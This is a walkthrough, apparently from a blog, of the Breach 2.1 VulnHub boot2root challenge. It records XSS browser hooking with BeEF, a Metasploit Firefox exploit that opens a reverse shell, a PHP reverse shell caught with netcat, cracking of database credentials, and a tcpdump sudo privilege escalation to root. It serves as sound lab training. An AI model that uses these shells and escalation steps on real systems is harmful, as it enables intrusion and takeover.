Breach: 2.1

Location

https://download.vulnhub.com/breach/Breach-2_final2.1.zip

Description

Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way.

The VM is configured with a static IP (192.168.110.151) so you’ll need to configure your host only adaptor to this subnet. Sorry! Last one with a static IP 😉

A hint: Imagine this as a production environment during a busy work day.

Shout-out to knightmare for many rounds of testing and assistance with the final configuration as well as rastamouse, twosevenzero and g0blin for testing and providing valuable feedback. As always, thanks to g0tmi1k for hsting and maintaining #vulnhub.

VirtualBox users: if the screen goes black on boot once past the grub screen make sure to go to settings —> general, and make sure it says Type: Linux Version: Debian 64bit

If you run into any issues, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub.

Looking forward to the write-ups, especially any unintended paths to local/root.

Happy hunting!

Enumeration

root@PlanetMars:~# nmap -T4 -A -sV -Pn -p- 192.168.110.151

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-28 19:58 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.151
Host is up (0.00050s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 40402/tcp status
|_ 100024 1 54166/udp status
40402/tcp open status 1 (RPC #100024)
65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
| 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
| 2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|_ 256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
MAC Address: 08:00:27:5C:61:B9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.58 seconds

The scan shows that port 65535 runs SSH. So I’ll start there.

root@PlanetMars:~# ssh 192.168.110.151 -p 65535
The authenticity of host '[192.168.110.151]:65535 ([192.168.110.151]:65535)' can't be established.
ECDSA key fingerprint is SHA256:r3uJxHJmvGvDbfvH0Y90EO5UAQNeokBIsxs6eDNpEdU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.110.151]:65535' (ECDSA) to the list of known hosts.
#############################################################################
# Welcome to Initech Cyber Consulting, LLC #
# All connections are monitored and recorded #
# Unauthorized access is encouraged #
# Peter, if that's you - the password is in the source. #
# Also, stop checking your blog all day and enjoy your vacation! # 
#############################################################################
root@192.168.110.151's password:

There is some useful information here. There is an user called peter, he has a blog and the password is in the source.

“Welcome to Initech Cyber Consulting” suggest this is a reference to the movie “Office Space“. So peter would be Peter Gibbons.

I searched google with all kinds of queries containing “blog”, “peter gibbons”, “vacation” and “Initech”. Nothing helpful come back. After a long time I figured I maybe was overthinking the whole thing and tried what literally was said in the banner. “The password is in the source“.

Password possibilities:
“in the source” –> nothing
“inthesource” –> bingo!

root@PlanetMars:~# ssh 192.168.110.151 -p 65535 -l peter
#############################################################################
# Welcome to Initech Cyber Consulting, LLC #
# All connections are monitored and recorded #
# Unauthorized access is encouraged #
# Peter, if that's you - the password is in the source. #
# Also, stop checking your blog all day and enjoy your vacation! # 
#############################################################################
peter@192.168.110.151's password: 
Connection to 192.168.110.151 closed.

It worked. The only problem is, that the connection was closed immediately. I gave it another try, but the result was the same. So the username:password combination worked, but was closed immediately. This should have a function and I thought about some kind of portknocking function. So I started another nmap scan.

root@PlanetMars:~# nmap -T5 -A -sS -p- 192.168.110.151

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-28 21:01 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.151
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Initech Cyber Consulting, LLC
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 40402/tcp status
|_ 100024 1 54166/udp status
40402/tcp open status 1 (RPC #100024)
65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
| 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
| 2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|_ 256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
MAC Address: 08:00:27:5C:61:B9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds

Webserver

My hunch paid off and this time port 80 was open.

logo

They really shouldn't have taken my stapler away...

In the source code there is a comment.

<!--I like hints! Here at Initech we don't trust our users and either should you!-->

<!--I'm not just going to stick creds here, really, I'm not. Sorry-->

After checking the existence of robots.txt (which wasn’t), I fired up dirb.

root@PlanetMars:~/Documents/CTF/breach2# dirb http://192.168.110.151/
..
==> DIRECTORY: http://192.168.110.151/blog/ 
==> DIRECTORY: http://192.168.110.151/images/ 
+ http://192.168.110.151/blog/index.php (CODE:200|SIZE:5600) 
+ http://192.168.110.151/blog/README (CODE:200|SIZE:721) 
==> DIRECTORY: http://192.168.110.151/blog/smilies/ 
==> DIRECTORY: http://192.168.110.151/blog/wysiwyg/ 
..

The blog that was mentioned earlier and a page called wysiwyg (what you see is what you get).

blog

tinyMCE.JPG

According to the www TinyMCE is a platform independent web-based JavaScript HTML WYSIWYG. TinyMCE enables to convert HTML textarea fields or other HTML elements to editor instances. After checking exploit-db both blogphp as tinymce are possibly vulnerable. Because there is a login page, I first try to get an error response…..nothing.

Cross Site Scripting

I return to the exploit-db page and start listing the possible expoits for blogphp. It seems there is a persistent XSS vulnerability. Normally XSS is useless in a vm (because of the lack of interaction). But because other options are running out and the picture of beef was quite clear, I’m going to try and hook someone (in this case something) with beef-xss. 

When I follow the instructions about the vulnerability it would take not long before I hooked my victim (cool feature btw). 

beef

It looks like I hooked Peter and he is using Firefox version 15. After checking exploit-db again, it seems that FF versions 5.0 until 15.0.1 are vulnerable and because of this vulnerability the AddonManager API can be invoked to silently install a malicious plugin. I also got his cookie for the grabs.

blogphp_username=admin; blogphp_password=0192023a7bbd73250516f069df18b500

Creating the malicious URL

I fire up metasploit and searched for the exploit mentioned on exploit-db.
The one I can use is exploit/multi/browser/firefox_proto_crmfrequest with the firefox/shell_reverse_tcp payload.

msf > use exploit/multi/browser/firefox_proto_crmfrequest
msf exploit(firefox_proto_crmfrequest) > set PAYLOAD firefox/shell_reverse_tcp
msf exploit(firefox_proto_crmfrequest) > set LHOST 192.168.110.3
msf exploit(firefox_proto_crmfrequest) > set SRVHOST 192.168.110.3
msf exploit(firefox_proto_crmfrequest) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.110.3:4444 
[*] Using URL: http://0.0.0.0:8080/NW9IzDE5f7h
msf exploit(firefox_proto_crmfrequest) > [*] Local IP: http://127.0.0.1:8080/NW9IzDE5f7h
[*] Server started.

Creating the Iframe

Next I’m going to use the created URL from metasploit and inject it inside an Iframe with beef.

iframe

Getting a command shell

[*] Meterpreter session 3 opened (192.168.110.3:4433 -> 192.168.110.151:49879) at 2016-08-30 11:59:33 +0200
meterpreter > shell
Process 2014 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(peter) gid=1000(peter) groups=1000(peter),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(scanner),115(bluetooth),1003(fishermen)

Now that I’m in, let’s get a proper TTY shell and start the recon.

$ python -c 'import pty;pty.spawn("/bin/bash")'

When I look at /etc/passwd it seems there are 3 users bill, peter and milton.
In the home dir of peter there is the shell script that’s responsible for the refreshing of the members.html page.

When I look for world writable directories I see there is another website in the form of /html2/ and it has an oscommerce directory in it.

When I use compgen -c I get a list of all installed applications. One of them is MySQL. Let’s try to find a file with some useful credentials.

peter@breach2:/usr/bin$ find / -name "config.php" 2<&1 | grep -v "Permission denied"
/var/www/html/blog/config.php

MySQL

User root is set with no password. Let’s log in.

peter@breach2:/usr/bin$ mysql -u root -p
Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 67
Server version: 5.5.49-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| blog               |
| mysql              |
| oscommerce         |
| performance_schema |
+--------------------+
5 rows in set (0.29 sec)

When looking at the content of the databases, I find some credentials in the oscommerce database.

+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
| 1  | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

After cracking the hash, the result is ’32admin’. Bit odd with the ‘:32’ behind it, which I needed to drop btw to get a successful crack. Maybe something with salting the password. Because I now have credentials for the oscommerce site, I’ll probably figure it out later on.

Finally I check sudo -l to check what peter can do on this machine. It turns out that peter can start and stop apache2 as root. Well, this will come in handy with the oscommerce site.

peter@breach2:/usr/bin$ netstat -tlpn

netstat.JPG

Netstat shows that ports 3306 and 2323 are listening on local host. Port 3306 is the default port for MySQL, but the interesting thing is port 2323.

peter@breach2:/usr/bin$ telnet 127.0.0.1 2323
telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W 
breach2 login:

Houston do you copy?

Coordinates? Where do they lead?
After I put the coordinates into Google Maps I was dropped right onto the Houston Police Officers’ Memoria. But why and to what end? The coordinates were followed by a login. I needed an username and password. Off course I tried the found oscommerce credentials, but that didn’t pay off. I checked Google for the combination “Office Space”, “Houston” and “movie” and according to the IMDB Trivia, Houston was where Peter lived. This couldn’t be a coincidence.

breach2 login: peter
Password: houston
Login incorrect


breach2 login: Peter
Password: houston
Login incorrect

breach2 login: Peter
Password: Houston
Login incorrect

breach2 login: peter
Password: Houston
Login incorrect

<18+filter>!@##$#%@!</18+ filter> Alright, that didn’t worked. But after a while (and a nice refreshing drink), it downed on me that there were other users on the machine. So let’s try those too.

Login incorrect
breach2 login: milton
Password: houston

Login incorrect
breach2 login: Milton
Password: Houston

Login incorrect
breach2 login: milton
Password: Houston

Last login: Wed Jul 20 21:04:18 EDT 2016 from localhost on pts/0
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W 
3
2
1
Whose stapler is it?

I think I know whose stapler it is hahahaha.

stapler.gif

I know the question, just not the answer. But this riddle is scripted and it’s coming from the machine. So I need to find the script that is running this and extract the answer.

peter@breach2:/home/peter$ grep -rnw '/' -e "Whose stapler is it" 2>/dev/null
/usr/local/bin/cd.py:16: question = raw_input("Whose stapler is it?")

peter@breach2:/home/peter$ cat /usr/local/bin/cd.py
..
while countdown >0:
 time.sleep(1)
 print(countdown)
 countdown -=1
if countdown <1:
 question = raw_input("Whose stapler is it?")
if question == "mine":
 os.system("echo 'Woot!'")
..

And there we got the answer.

Checking out Milton

sudo -l
Sorry, user milton may not run sudo on breach2.

That’s disappointing. Milton can’t use sudo. After some time it looks like Milton as an user isn’t that useful. But why all this trouble? Because there was some form of port knocking in the beginning, I hoped that successfully telnetting to port 2323 opened another port.

8888/tcp open http nginx 1.6.2
| http-ls: Volume /
| SIZE TIME FILENAME
| - 15-Jun-2016 20:50 oscommerce/
| 867 15-Jun-2016 18:09 index.nginx-debian.html
|_
|_http-server-header: nginx/1.6.2
|_http-title: Index of /

OS Commerce

oscommerce.JPG

It looks like OS Commerce is running version 3.0 alpha 5. After a quick search it looks like there are plenty vulnerabilities for OS Commerce and for this version there is one in particular.

--------------------------------------------------------------------------
osCommerce 3.0a5 - Local File Inclusion / HT   | ./php/webapps/33913.html
--------------------------------------------------------------------------

Let’s start with some basic enumeration and fire up dirb.

..
+ http://192.168.110.151:8888/oscommerce/.htaccess (CODE:200|SIZE:829) 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/admin/ 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/download/ 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/ext/ 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/images/ 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/includes/ 
+ http://192.168.110.151:8888/oscommerce/index.php (CODE:200|SIZE:9029) 
+ http://192.168.110.151:8888/oscommerce/info.php (CODE:200|SIZE:8064) 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/pub/ 
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/templates/
..

Because I already have the admin credentials from earlier on, I thought it would be a good time to use them.

admin.JPG

After several (a lot) of tries to get the HTML injection working, I focus on a different approach. Maybe it’s possible to alter an already existing file and create a backdoor. But when I try to alter one of the files I get an error 😦

Error: The product images directory is not writable: /var/www/html2/oscommerce/images/products

That’s not gonna work. So I need a folder that is writable at my level. When I check for some world writable folders on the server in the /html2/ directory it seems there is one.

milton@breach2:/var/www/html2$ find /var/www/html2/ -perm -0002 -type d
/var/www/html2/oscommerce/includes/work

Another reverse shell

To get a reverse shell I used the php reverse shell from pentestmonkey. But when I try to wget it, it arrives empty. To solve this problem, I compress the php file and give it another shot. This time it worked.

shell

root@kali:~# nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.110.3] from (UNKNOWN) [192.168.110.151] 45768
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64 GNU/Linux
 11:35:08 up 4:53, 4 users, load average: 0.01, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
milton pts/2 localhost 07:12 1:47m 0.20s 0.19s -bash
milton pts/10 localhost 11:19 40.00s 0.14s 0.13s -bash
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh),1004(fin)
/bin/sh: 0: can't access tty; job control turned off
$

Now I’m in as blumbergh (bill). First I switch to a proper TTY shell and then check with sudo -l what this account can do.

User blumbergh may run the following commands on breach2:
 (root) NOPASSWD: /usr/sbin/tcpdump

TCPDUMP

So this account can run tcpdump as root. I know it’s a packet capture program. But how this could help me get root I’m not sure. Thanks to a helpful site I learned how to get root by abusing tcpdump when running it as root.

blumbergh@breach2:/home/bill$ echo -e "cp /bin/sh /home/bill/sh_suid\nchmod 7555 /home/bill/sh_suid" > tmpfile
blumbergh@breach2:/home/bill$ ls
tmpfile
blumbergh@breach2:/home/bill$ chmod +x tmpfile
blumbergh@breach2:/home/bill$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmfile -Z root
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
blumbergh@breach2:/home/bill$ ls -l /home/bill/sh_suid
-r-sr-sr-t 1 root root 125400 Aug 31 11:56 /home/bill/sh_suid
blumbergh@breach2:/home/bill$ /home/bill/sh_suid
# whoami
root

YEAH!!!! When I check the root folder I get the price for all this hard work!

flag

Conclusion

This was a very fun challenge and an enormous learning experience.
Thanks to mrb3n and all the people who have made this boot2root challenge one of the best so far.

 

Advertenties